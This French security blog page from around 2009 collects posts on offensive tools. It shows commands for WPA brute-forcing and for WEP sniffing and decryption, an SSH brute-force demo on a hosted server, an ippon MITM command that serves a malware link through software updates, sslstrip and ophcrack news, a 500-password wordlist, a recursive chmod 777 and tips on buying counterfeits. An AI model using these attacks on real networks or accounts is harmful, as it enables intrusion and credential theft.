demo avec le bruteforcer HYDRA Gtk sur SSH

Cette démonstration, montre hydra GTK et ce qu'il ne faut pas faire, je bruteforce le SSH root d'un serveur hébergé chez OVH (merci awaxx) à la base je devais pas dutout faire ca mais vu que ca a complètement foiré, j' ai profité pour faire une video de bruteforce.

J'utilise la version via le gui "hydra GTK", si vous désirez tester vous devez patcher hydra pour qu'il fonctionne avec es dernières lib ssh.

Dans le même style on a medusa (uniquement en CLI ), attention ca ne fonctionne pas avec la même lib SSH.
Vous avez aussi ncrack (tout récent dev par un mec de chez nmap)



Le but de cette video encourage a utiliser des protections appropriés et surtout utiliser un bon mot de passe, sans protection, ca va relativement vite donc attention !
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

GSM prend une claque :/

C'est la journée des claques ^^, apparemment une démonstration sympa au chaos computer club est prévu, le cassage d'un algo utilisé par les gsm, un outil sera disponible en téléchargement, prérequis une antenne spécifique (et un pc...)

Si ca vous interesse la news chez register (ang) et la version (allemande)
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

WPA reprend une claque :/

D'après un pdf sur http://jwis2009.nsysu.edu.tw, des chercheurs seraient capable de passer une nouvelle attaque sur le wpa en se basant sur les travaux de Beck et Tews (qui a donné naissance à tkiptun-ng).

Le but n'est pas de retrouver la clé wpa mais d'être en man in the middle.

Le papier décrit: "practical message falsification"

D'après ce qu'ils disent l'attaque est plus rapide que celle de tkiptun-ng et touche toutes les implémentations de WPA.

"This paper has proposed a practical message falsification attack on any WPA
implementation. Our attack is a method that applies the Beck-Tews attack to
the MITM attack, and can falsify an encrypted short packet (e.g. ARP packet).
We have given a strategy for the MITM attack and the method for reducing
the execution time of the attack. As a result, the execution time of our attack
becomes about one minute in the best case. Therefore, our attack can execute
on any WPA implementation, practically.
The future works are the demonstration experiment for our attack and the
evaluation of the detailed execution time of our attack."

bref le pdf

crack de clé wep et wpa
tuto crack wpa airolib-ng
tuto crack wpa cowpatty
tuto crack wpa spoonwpa
tuto crack wpa aircrack-ng

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Crack WPA pure bruteforce (sans dico)

Dans cette demo video de crack wpa, j'utilise le pcap fournit avec l'application aircrack-ng pour réaliser un vrai bruteforce, le but de cette demo, est surtout de montrer le temps nécessaire pour l'attaque. Comme vous le verrez c'est tout a fait faisable mais faut quand même une bonne puissance si vous voulez pas vous tapper 20 ans de bruteforce pour une passphrase en 8 caractères et simplement en lower case.

Le but du jeux  est d'utiliser crunch et de faire un pipe vers aircrack-ng (possible aussi avec john the ripper etc)

Syntaxe utilisé:


cd /pentest/password
./crunch 8 8 bcdefghijklmnopqrst -t bisco@@@ | aircrack-ng /pentest/wireless/aircrack-ng/test/wpa.cap -e test -w -

Vous allez ainsi pouvoir admirer que le crack wpa est quasi impossible sur une clé par défaut (en temps), vous aurez beau avoir le super dico de la mort qui tue, vous ne casserez jamais quoi que ce soit, car les possibilités sont bien trop énormes (ou alors faut avoir une chance démesuré...)

Pour le fun: password en 20 caractères lower case a 400 pass/sec: Brute Force Attack will take up to 1601735218557855000 years


L'application pour que vous evitiez de perdre votre temps: lastbit


crack de clé wep et wpa
tuto crack wpa airolib-ng
tuto crack wpa cowpatty
tuto crack wpa spoonwpa
tuto crack wpa aircrack-ng
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

aircrack-ng 1.1 les prévisions

Aircrack-ng 1.1 devrait intégrer le support des tables cowpatty sans conversion via airolib-ng, ce qui est une très bonne chose, il y aura aussi du bugfix, et peut être un (ou des) driver(s) supportant l'injection sous Mac OS X.

La version 1.0 devrait quand à elle pas tarder, les vérifications via la 1.0rc4 détermineront si la version stable est prête ou pas.

La page aircrack-ng va aussi changer d'apparence elle sera disponible à la sortie de la version 1.0 stable, ce qui devrait économiser la bande passante. (preview)

Le logo va être changé, un contest à été réalisé pour le new logo, offrant au gagnant un tee shirt aircrack-ng.
Le logo qui à gagné (un de la première série):




Perso, moi j'attend plus un mode cluster mais bon, c'est déjà bien ce qui est prévu :)

Le site web: aircrack-ng

crack de clé wep et wpa
tuto crack wpa airolib-ng
tuto crack wpa cowpatty
tuto crack wpa spoonwpa
tuto crack wpa aircrack-ng Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

firefox 3.5 change la gestion des mots de passes

Firefox 3.5 change désormais sont format de backup des password et loggin enregistrés, cela passe en sqlite, c'est donc dans le format employé par google chrome que vous retrouverez vos passwords.

Ce qui rend firepassword et firemaster inefficace sur les versions de firefox 3.5 et supérieurs, pour le moment.
Plus d'info disponible sur le blog de l'auteurs: Explosing the New Sign-on Format of Firefox 3.5.
D'après ce qu'on peut lire le casseur de firefox est en construction. :)
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

tite coquille, sur le tuto xplico

Une petite erreur c'est glissé dans le Tuto xplico partie installation, c'est désormais corrigé, cette erreur vous empèche d'utiliser le fichier .kml généré pour une lecture dans google earth, les autres fonctions de xplico ne sont aucunement altérés (c'est optionnel)

Merci à Gianluca pour la rectification

récapitulatif:

cd /tmp
wget http://downloads.sourceforge.net/project/xplico/xplico/version%200.5.2/xplico-0.5.2.tgz
tar zxvf xplico-0.5.2.tgz
wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.5.tar.gz
tar zxvf GeoIP-1.4.5.tar.gz
cd GeoIP-1.4.5
./configure
make
make install
#le make install est pas necessaire, c'est si vous désirez l'avoir dans votre #filesysteme
rm -f *.tar.gz
cd /tmp/xplico
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f *dat.gz
make
cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2
#de ghostpcl on a juste besoin de pcl6 c'est necessaire pour "network printer job"
rm -f *.bz2
cd ghostpdl-8.70
make
#ca ca prend du temps...
cd ..
cp /tmp/ghostpdl-8.70/main/obj/pcl6 /tmp/xplico/
rm -rf ghostpdl-8.70
cd /tmp/xplico
make install

dsl Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

tuto Xplico internet decodeur

Comme on me l'avait demandé, je réalise un tuto sur xplico, la première partie présente l'installation d'xplico et son web ui, la seconde partie montre son utilisation en live sur du Wep (video + texte); la troisième partie montre son utilisation réelle c'est à dire en forensics sur un fichier pcap (video + texte), et la partie 4 en cli.

Alors, Xplico permet quoi ? il permet d'avoir une vision "humaine" du contenu de votre pcap, si vous prenez wireshark, vous voyez trucs muche tcp icmp etc, vous pouvez extraire l'intégralité via follow tcp stream, mais pour une visualisation rapide du contenu cela n'est pas l'idéal.

C'est là qu'intervient xplico, il va permettre de voir directement les images videos etc.

Let's go on installe le cool tool, je pars sur une base ubuntu, mais pour les autres ca montre bien les dépendances et ne devrait pas poser de problèmes majeurs.


sudo su
#libpcap est nécessaire, mais on va foutre des trucs en plus pour les scripts.

apt-get install sqlite tcpdump tshark libx11-dev libxt-dev libxi-dev apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite0-dev libmysqlclient15-dev python2.5-minimal python2.5 python-all

#sqlite car il nous faut la version 2 d'sqlite + la lib-dev
#(nommé sqlite dans les dépots ubuntu)
#apache2 ca c'est pour la web ui (interface web) pas
#obigé php5-sqilte idem
#tcpdump tshark pour les scripts et de toute manière
#libpcap nécessaire (tshark peut ne pas etre utilisé ou rempacé
#par wireshark qui le contient)
#zlib1g ca c'est pour geoip
#libx* pour pcl6 (option)


cd /tmp
wget http://downloads.sourceforge.net/project/xplico/xplico/version%200.5.2/xplico-0.5.2.tgz

tar zxvf xplico-0.5.2.tgz
wget http://geolite.maxmind.com/download/geoip/api/c/GeoIP-1.4.5.tar.gz
tar zxvf GeoIP-1.4.5.tar.gz
cd GeoIP-1.4.5
./configure
make
make install
rm -f *.tar.gz
cd /tmp/xplico
wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
gzip -d GeoLiteCity.dat.gz
rm -f *dat.gz
make
cd ..
wget http://mirror.cs.wisc.edu/pub/mirrors/ghost/GPL/ghostpdl/ghostpdl-8.70.tar.bz2
tar jxvf ghostpdl-8.70.tar.bz2
#de ghostpcl on a juste besoin de pcl6 c'est necessaire pour "network printer job"
rm -f *.bz2
cd ghostpdl-8.70
make
#ca ca prend du temps...
cd ..
cp /tmp/ghostpdl-8.70/main/obj/pcl6 /tmp/xplico/
rm -rf ghostpdl-8.70
cd /tmp/xplico
make install

#Ça c'était la part 1 de l'installation, maintenant on installe la web ui
#(interface web)

cd /var/www
wget http://downloads.sourceforge.net/project/xplico/xplico/version%200.5.2/xplico_interface-0.5.2.tgz
tar zxvf xplico_interface-0.5.2.tgz
rm -f *2.tgz

#le chmod recursif en 777 c'est si vous avez un problème d'accès,
#attention ca offre les droits max,
#lecture écriture exécution pour tous les fichiers groupes utilisateurs.

chmod -R 777 /gui.xplico.org

On continue ?
Ok il faut que l'interface web soit accessible pour apache avec toutes les options activées et allow override allow.

Pour plus de simplicité vous pouvez directement télécharger la conf (ca ne touche en rien apache, ça active tout pour xplico et uniquement xplico.

cd /etc/apache2/sites-enabled
wget http://bricowifi.free.fr/xplico

Ensuite dans /etc/apache2/ports.conf vous devez ajouter xplico et son port
Voici un extrait du mien avec l'ajout en rouge:

# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default
# This is also true if you have upgraded from before 2.2.9-3 (i.e. from
# Debian etch). See /usr/share/doc/apache2.2-common/NEWS.Debian.gz and
# README.Debian.gz
# xplico Host port
NameVirtualHost *:9876
Listen 9876
NameVirtualHost *:80
Listen 80

Il faut aussi éditer php.ini pour le down, l'upload max:

nano /etc/php5/apache2/php.ini

post_max_size = 100M

upload_max_filesize = 100M

On oublie pas d'activer le mode rewrite sur apache !!!!

a2enmod rewrite

Terminé, on relance apache:
/etc/init.d/apache2 restart

///////////////Pour le tutoriel d'instalation c'est terminé///////////// ouf... (merci de préciser si y a une coquille)

• Phase 2 Demo live Wep sniffing avec airodump-ng et airtun-ng; décodage avec Xplico
  

Détail des commandes:

airmon-ng
airmon-ng start wlan1
airodump-ng -w /root/Bureau/s -c 11 --bssid 00:11:22:33:44:55 mon0

(airmon-ng pour passer a carte en monitor)
(airodump-ng pour enregistrer; -w "écrire" -c "canal" --bssid "@ mac de l'ap")

|-------------------------------------------------------------------

|--[3] Launch airtun-ng with the Wep key and mount your tun/tap at0

airtun-ng -a 00:11:22:33:44:55 -w 55:44:33:22:11 mon0
ifconfig at0 up

(airtun-ng -a "@mac ap" -w "clé wep" interface wifi)

|-------------------------------------------------------------------

|--[4] Hack Xplico

| a] enlevez /opt/xplico/xplico.db
| b] enlevez tous /opt/xplico/pol
| c] exec:
| cd /opt/xplico/script/db/sqlite2
| ./create_xplico_db.sh
| d] avec la web ui, réalisez une seul case
| c] dans cette case créez seulement une session d'écoute (sol) listening sessions
| ici /opt/xplico/script vous trouverez
| rt_demo.sh. éditez l'interface par la votre



cd /opt/xplico/script/ && ./sqlite_demo.sh
|#abort

|-------------------------------------------------------------------

|--[5] Run Xplico in live, 1337

cd /opt/xplico/script/ && ./rt_demo.sh

• Phase 3 demo forensics sur un pcap avec xplico, airdecap-ng pour decrypter le Wep et décoder son contenu
  

Détail des commandes:

|--[1] First decrypt your wep packet

airdecap-ng -w 55:44:33:22:11 s-01.cap

(airdecap-ng -w "clé wep" "emplacement pcap"

|-------------------------------------------------------------------

|--[2] Run Xplico demo sqlite

cd /opt/xplico/script/ && ./sqlite_demo.sh

|-------------------------------------------------------------------

|--[3] Jump to the web ui, create case & sol, upload your pcap (*dec*)

http://127.0.0.1:9876

• Phase 4 Xplico en cli (sans l'interface web)

On se place dans notre répertoire de binaire:

./xplico -m pcap -f s-01.cap

pour un dossier de pcap:

./xplico -m pcap -d ~/wardrive/

En temps reel sur eth0:

./xplico -m rltm -i eth0

Voila qui boucle le tuto sur xplico, site web: xplico
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

IPPON MITM v defcon 17

ippon, est un logiciel présenté à la defcon 17, ippon permet de jouer avec l'update de certain logiciel un peu comme evilgrade.
En gros on est en man in the middle, lors d'une update d'un logiciel il va bloquer et télécharger ce qu'on lui demande (malware)

ippon est un simple script python, il lit la configuration d'un fichier xml, contenant par défaut l'update de chez malwarebytes, skype et notepad++

REQUIREMENTS:
-------------

Python 2.5 and higher (verified on 2.5)
Scapy latest release (verified on 2.0.1)
Ubigraph alpha-0.2.4 (http://ubietylab.net/ubigraph/)

PREPARE WIFI:
-------------

There are several different ways to get your wifi/wlan0/ath0 into monitor mode.

For eg.

iwpriv wlan0 hostapd 1

or

wlanconfig ath0 create wlandev wifi0 wlanmode monitor

INSTALL:
--------

Just run ippon.py and you're good to go!

ATTACK:
-------

./ippon.py -w -i [INTERFACE] targets.xml -v -u [LINK TO MALWARE]

or

Make sure ubigraph_server is running (e.g. ./UbiGraph-alpha-0.2.4-Linux32-Ubuntu-8.04/bin/ubigraph_server )

./ippon.py -w -i [INTERFACE] targets.xml -v -u [LINK TO MALWARE] -3

le site: chez googe code
le direct download de la version ippon defcon 17: wget http://ippon-mitm.googlecode.com/files/IPPON_dc17.zip

tuto ettercap

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

des Ray-Ban à 7 euros 0_0

Photo (ray ban mise en vente pour 0.01 centime d'euros ~7E avec les ports)

On m'a demandé l'autre jour, si un site était "sur" (phishing etc) et donc je regarde le truc, des ray ban misent en vente à partir de 0.01 centimes d'euro aux enchères :s
Bien entendu c'est de la contre façon, et à voir les commentaires elles partent pour que dalle.

J'ai regardé un peu sur google, et il s'avère que certaine personne ont posté leur retour d'experience d'achat, en gros c'est positif.

Si vous désirez acheter cela (en fr) c'est illégal bien entendu...
(sinon pour le coté "sur" ouai c'est bien, payement via paypal etc "gros site")

Le site (genre ebay): http://www.ioffer.com/

(mot clé utilisé: "RB3025 silver")
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

:/

/me préfère prendre l'escalier si possible... Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

XPLICO 0.5.2 le décodeur internet dispo

Xplico, peut etre utiliser pour analyser des fichier pcap ou être utilisé en capture direct, il est construit de tel sorte, qu'il permet de décoder pour vous les fichier, ce n'est pas du tout un wireshark.
Si on prend par éxemple un pcap et qu'on l'ouvre avec wireshark on va voir tous les paquets contenue, ici, si on l'ouvre avec xplico il va directement convertir en fichier compatible google earth, vous monter le jpg, la video contenue dans la capture, les mails etc; c'est un peu comme un driftnet en bien plus complet puis qu'il ne se limite pas que aux images et videos.

Les nouveautés apparemment se situe au niveau de l'interface web, comme vous pouvez voir ici:



Alors l'ancienne interface web c'était pas du gateau a installer, j'ai pas test celle la, en esperant que c'est mieux foutu :)

Le site internet: xplico

Download:

wget http://downloads.sourceforge.net/project/xplico/xplico/version%200.5.2/xplico-0.5.2.tgz

wget http://downloads.sourceforge.net/project/xplico/xplico/version%200.5.2/xplico_interface-0.5.2.tgz

tuto xplico
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

the middler 2 pour du fun MITM VOIP, et web

The middler 2 est disponible en download via svn, d'après ce que leur talk dit pour la defcon 17, ca à l'air bien sympa, ils s'attaquent à la voip (voice over internet), ce qui va permettre des interactions en mitm. The middler était déja capable d'interagir avec la woueb genre caller le js de beef, de la frame injection, donc des plugins comme beef et metasploit étaient deja présents, j'attends de voir la suite avec impatience, savoir si toute la voip va être géré par middler, ou renvoyer sur un autre outil via un plugin ?

" The Middler is a next-generation man-in-the-middle tool that takes the focus beyond the raw mechanics of the protocol on to the application itself. New for Def Con, it now can man in the middle Voice over IP (VoIP), producing the opportunity to interactively redirect calls, join them, or take them over. All of these effects join The Middler's goal of putting the victim into a kind of matrix by implementing man in the middle attacks specific to each web application. We've also added a graphical interface, allowing for interactive target selection based on information that The Middler gathers about potential victims. We've added more applications and enhanced the set of non-application specific capabilities, including easy session cloning, IFRAME injection and a Java script exploit library that can force the user into the Browser Exploitation Framework (BeEF) or a Metasploit exploit. This demo-filled talk will enhance your man in the middle powers just in time for one of the most hostile networks ever seen.
"
Defcon Beale && Searle


Le site de middler: inguardians
Le hoster de middler avec svn: google code middler

svn checkout http://middler.googlecode.com/svn/trunk/ middler
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Pyrit --> génération de tables WPA --> Crack WPA

Pyrit est destiné à la génération de tables WPA pour le crack WPA à grande vitesse, mais peut maintenant aussi directement faire le crack WPA tout seul comme un grand.
Il inclue donc de nouvelles options bien sympa, je rappelle que le logiciel pyrit est open source, est développé en python, supporte entre autre cpu sse2, nvidia cuda, ati stream...

Sur le test de l'auteur ont peux lire: Tried 3443172 PMKs so far; 675577 PMKs per second.

• ‘analyze’ parses a pcap-dump and shows some information about AccessPoints, Stations and the presence of WPA-PSK handshakes.
• ‘attack_passthrough‘ is the most basic attack mode and resembles piping PMKs to other tools like cowpatty. It takes a pcap-dump and attacks available handshakes using passwords read from a file. The database is not touched at all by this. Good for LiveCDs but you lose the advantage of having pre-computed PMKs.
• ‘attack_batch‘ uses passwords and PMKs stored in the database to attack the handshake. The PMKs are taken from the databased if already computed. Otherwise the passwords are translated into their respective PMKs which are stored on-the-fly for later re-use.
• ‘attack_db‘ uses only PMKs that are already in the database. Handy if you don’t want your box to get crushed under load.

Le post qui en parle sur le blog: pyrit

Le repo (svn etc): pyrit google code

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit



crack de clé wep et wpa
tuto crack wpa airolib-ng
tuto crack wpa cowpatty
tuto crack wpa spoonwpa
tuto crack wpa aircrack-ng
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

blackhat 2009 talk dispo

Quelque talk de la BH (blackhat) USA sont disponible directement sur leur site si cela vous intéresse. Donc y a pas tout, mon retrouve des pdf, des videos quelque codes source (notamment un Metula Net Framework Rootkit, un proxy open source en java)...

Bref, le lien: blackhat
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

SSLSTRIP version 0.4 :)

Nouvelle version de sslstrip qui est maintenant plus rapide et fonctionne avec python 2.6, elle corrige deux bugs au passage, pour rappel le but du jeux est de faire un man in the middle, intercepter les requetes http, filtrer le ssl, et le downgrader sur du http, le but étant d'avoir password en clair, et / ou cookie non sécurisé.

Changes in 0.4 (7/24/09)

• Fixed a bug that would result in truncated pages.
• Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
• Included some optimzations that should speed things up again.

Changes in 0.3 (7/15/09)

• Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
• Included some optimizations that should speed things up a little.

Site de l'auteur: SSLSTRIP
Direct Download: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.4.tar.gz

Demo video: 1 chez l'auteur | 2 chez benjy
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

ophcrack passe en version 3.3.1

Nouvelle version de ophcrack, et ophcrack live cd. (ophcrack est un casseur de mot de passe très utile pour avoir le pass admin sous une machine xp ou autre (via le fichier sam)
Passage vers la 3.3.1 pour le logiciel ophcrack, et 2.3.1 pour le live cd.
Il n'y a rien de vraiment neuf, c'est surtout de la correction de bug.

ophcrack:

"This is bugfix release. An issue with the vista_seven tables on 32 bits architecture has been fixed, as well as some stuff related to the audit mode and CSV output.

The LiveCD corrects two recurrent problems: the misdetection of the CD on machines having more than one CD drive and memory exhaustion on machines with less RAM (lowram mode)."

Direct download pour le logiciel: (linux) wget http://downloads.sourceforge.net/ophcrack/ophcrack-3.3.1.tar.bz2

idem pour win32 compilé: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.3.1.exe

Leur site: ophcrack
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Les 500 passwords qu'il ne faut pas utiliser...

Je suis passé chez what's my pass, voir un peu ce que je pouvais tirer de leur html, et, le top 500 me semble interessant, le pire du pire des password, les plus pourris :).
On notera qu'il y a beaucoup de rapport au sex, des prenoms, des noms de bagnole etc, enfin bref, la liste sans tableau si vous voulez copier coller rapidement cette wordlist:

(ce n'est pas classé par pass le plus courant au moins, voir plus bas le lien direct vers le tableau de leur page)


123456
porsche
firebird
prince
rosebud
password
guitar
butter
beach
jaguar
12345678
chelsea
united
amateur
great
1234
black
turtle
7777777
cool
pussy
diamond
steelers
muffin
cooper
12345
nascar
tiffany
redsox
1313
dragon
jackson
zxcvbn
star
scorpio
qwerty
cameron
tomcat
testing
mountain
696969
654321
golf
shannon
madison
mustang
computer
bond007
murphy
987654
letmein
amanda
bear
frank
brazil
baseball
wizard
tiger
hannah
lauren
master
xxxxxxxx
doctor
dave
japan
michael
money
gateway
eagle1
naked
football
phoenix
gators
11111
squirt
shadow
mickey
angel
mother
stars
monkey
bailey
junior
nathan
apple
abc123
knight
thx1138
raiders
alexis
pass
iceman
porno
steve
aaaa
fuckme
tigers
badboy
forever
bonnie
6969
purple
debbie
angela
peaches
jordan
andrea
spider
viper
jasmine
harley
horny
melissa
ou812
kevin
ranger
dakota
booger
jake
matt
iwantu
aaaaaa
1212
lovers
qwertyui
jennifer
player
flyers
suckit
danielle
hunter
sunshine
fish
gregory
beaver
fuck
morgan
porn
buddy
4321
2000
starwars
matrix
whatever
4128
test
boomer
teens
young
runner
batman
cowboys
scooby
nicholas
swimming
trustno1
edward
jason
lucky
dolphin
thomas
charles
walter
helpme
gordon
tigger
girls
cumshot
jackie
casper
robert
booboo
boston
monica
stupid
access
coffee
braves
midnight
shit
love
xxxxxx
yankee
college
saturn
buster
bulldog
lover
baby
gemini
1234567
ncc1701
barney
cunt
apples
soccer
rabbit
victor
brian
august
hockey
peanut
tucker
mark
3333
killer
john
princess
startrek
canada
george
johnny
mercedes
sierra
blazer
sexy
gandalf
5150
leather
cumming
andrew
spanky
doggie
232323
hunting
charlie
winter
zzzzzz
4444
kitty
superman
brandy
gunner
beavis
rainbow
asshole
compaq
horney
bigcock
112233
fuckyou
carlos
bubba
happy
arthur
dallas
tennis
2112
sophie
cream
jessica
james
fred
ladies
calvin
panties
mike
johnson
naughty
shaved
pepper
brandon
xxxxx
giants
surfer
1111
fender
tits
booty
samson
austin
anthony
member
blonde
kelly
william
blowme
boobs
fucked
paul
daniel
ferrari
donald
golden
mine
golfer
cookie
bigdaddy
0
king
summer
chicken
bronco
fire
racing
heather
maverick
penis
sandra
5555
hammer
chicago
voyager
pookie
eagle
yankees
joseph
rangers
packers
hentai
joshua
diablo
birdie
einstein
newyork
maggie
sexsex
trouble
dolphins
little
biteme
hardcore
white
redwings
enter
666666
topgun
chevy
smith
ashley
willie
bigtits
winston
sticky
thunder
welcome
bitches
warrior
cocacola
cowboy
chris
green
sammy
animal
silver
panther
super
slut
broncos
richard
yamaha
qazwsx
8675309
private
fucker
justin
magic
zxcvbnm
skippy
orange
banana
lakers
nipples
marvin
merlin
driver
rachel
power
blondes
michelle
marine
slayer
victoria
enjoy
corvette
angels
scott
asdfgh
girl
bigdog
fishing
2222
vagina
apollo
cheese
david
asdf
toyota
parker
matthew
maddog
video
travis
qwert
121212
hooters
london
hotdog
time
patrick
wilson
7777
paris
sydney
martin
butthead
marlboro
rock
women
freedom
dennis
srinivas
xxxx
voodoo
ginger
fucking
internet
extreme
magnum
blowjob
captain
action
redskins
juice
nicole
bigdick
carter
erotic
abgrtyu
sparky
chester
jasper
dirty
777777
yellow
smokey
monster
ford
dreams
camaro
xavier
teresa
freddy
maxwell
secret
steven
jeremy
arsenal
music
dick
viking
11111111
access14
rush2112
falcon
snoopy
bill
wolf
russia
taylor
blue
crystal
nipple
scorpion
111111
eagles
peter
iloveyou
rebecca
131313
winner
pussies
alex
tester
123123
samantha
cock
florida
mistress
bitch
house
beer
eric
phantom
hello
miller
rocket
legend
billy
scooter
flower
theman
movie
6666
please
jack
oliver
success
albert

Le lien direct avec le tableau: what's my pass ?
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Ipredator le VPN à 5 € made in piratebay run :]

Le projet Ipredator de la team de thepiratebay vient d'être lancé au publique (testeur).
Le but du truc c'est de faire passer votre connexion via leur vpn, pour un moindre coup (5 euros par mois), aucune donnés sont collectés.

Résultat si vous n'avez pas moyen de monter votre serveur vpn dans un pays plus libre que en fr, vous pouvez toujours tester cela.

Hi there!

It's finally time for (the beta testing of) IPREDator!

We're very sorry for the delay. It's just to be safe rather than sorry, regarding the technical aspects. It's very safe now at least!

Click on the link below to register to the service!

NB!

1. You can only reach the site using this link.
2. The link is unique and only ONE (1) user can sign up using it.

------------URL-----------

On the site you will get all the information you need!

IPREDator does not store any personal details about its clients.
IPREDator does not store any traffic habits you might have.
IPREDator is the key to a free internet in the renaissance of censorship!

Team IPREDator

Donc si ca vous tente d'utiliser les services de leur vpn, ca se passe labas: https://www.ipredator.se/ Ca devrait bientot être ouvert pour tout le monde.
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

liferea et lynx pour du speed RSS browsing

J'utilise depuis un moment netvibes, (lecteur de flux RSS en ligne) mais le truc c'est qu'on est dépendant du bon fonctionnement de leur serveur (bien qu'ils fonctionnent très bien). Ducoup j'avais envies de me prendre un agrégateur de flux RSS pour ma machine.

Vu que je tourne sous linux c'est pas un problème j'en ai pris un au pif avec l'icone ubu pour une meilleur compatibilité, et il s'avère pas mal, liferea, il est parfaitement intégré a gnome (ou autre je pense) il fonctionne en tray icon, et change simplement de couleur quand une news arrive.

La gestion des RSS est classable par dossier, vous pouvez utiliser le browser que vous voulez pour la lecture du rss, liferea en intègre un, au cas ou vous avez des flux ne donnant pas l'intégralité du post.

Ducoup j'ai testé avec firefox, donc le truc c'est que firefox ca met trois plombe à se lancer et en plus ca fait un nouveau dossier de cache.
Le browser intégré est pas trop mal sinon, mais ca ne bloque pas toutes les pubs (on peut bloquer javascript) mais ca aussi ca ne bloque pas tout.

Par contre avec lynx la ca dépote, le navigateur en shell, déja ca se lance pas à la même vitesse qu'un firefox, les pages sont instantannés, pas de pubs pas de bannières, que le texte.

Pour tester lynx, rendez vous dans Tools, Preferences Browser. moi je display lynx dans le shell terminator (dispo dans les dépots); browser: manual, open link in: new window; manual: terminator -e "lynx %s;bash" (vous pouvez remplacer terminator par xterm, mais ca va être tout petit)

Deux captures pour vous montrez le truc quand même:

Terminator, lynx et liferea sont disponible dans les dépots ubuntu

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D